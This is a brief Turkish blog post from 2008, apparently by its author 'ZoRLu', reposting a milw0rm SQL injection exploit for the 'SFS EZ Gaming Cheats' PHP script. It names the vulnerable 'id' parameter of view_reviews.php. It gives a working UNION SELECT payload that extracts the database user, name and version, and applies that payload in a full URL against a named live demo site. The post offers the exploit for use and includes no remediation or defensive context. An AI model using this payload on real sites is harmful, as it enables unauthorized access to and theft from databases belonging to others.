"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

1 Kasım 2008 Cumartesi

SFS EZ Gaming Cheats (id) Remote SQL Injection vulnerability

SFS EZ Gaming Cheats (id) Remote SQL Injection vulnerability

link: http://www.milw0rm.com/exploits/6924

Discovered By: ZoRLu

Exploit:

http://localhost/script_path/view_reviews.php?id=[SQL]

[SQL]=

-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--

demo

http://turnkeyzone.com/demos/cheats/view_reviews.php?id=-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--


0 yorum:

 
Dizi